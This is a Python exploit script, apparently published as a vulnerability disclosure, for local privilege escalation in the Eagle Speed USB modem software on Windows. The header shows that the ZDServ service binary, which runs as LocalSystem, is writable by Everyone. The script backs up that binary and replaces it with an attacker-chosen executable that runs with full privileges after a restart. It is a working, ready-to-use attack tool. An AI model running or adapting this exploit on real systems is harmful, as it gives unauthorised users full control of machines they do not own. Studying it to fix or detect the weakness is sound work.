#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
# TYPE : 110 WIN32_OWN_PROCESS (interactive)
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : ZDServ
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Administrators:(I)(F)
# Victim-PC\lowpriv:(I)(F)
# BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#
import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
print '\n Usage : exploit.py program.exe\n'
print 'https://infogen.al/'
else:
program = sys.argv[1]
if(not os.path.isfile(program)):
print "[-] The parameter was incorrect, use a correct filename [-]"
exit(0)
if(not os.path.isfile(path)):
print "[-] File not found , propably service doesn't exists [-]\n"
else:
print "[+] Backing up the binary [+]"
os.system(file_move)
print "[+] Copying the payload [+]"
os.system("copy " + program + " " + path)
if(filecmp.cmp(program,path)):
print "[+] Exploit successfull, wait for service to restart or reboot [+]"
else:
print "[-] Exploit failed [-]"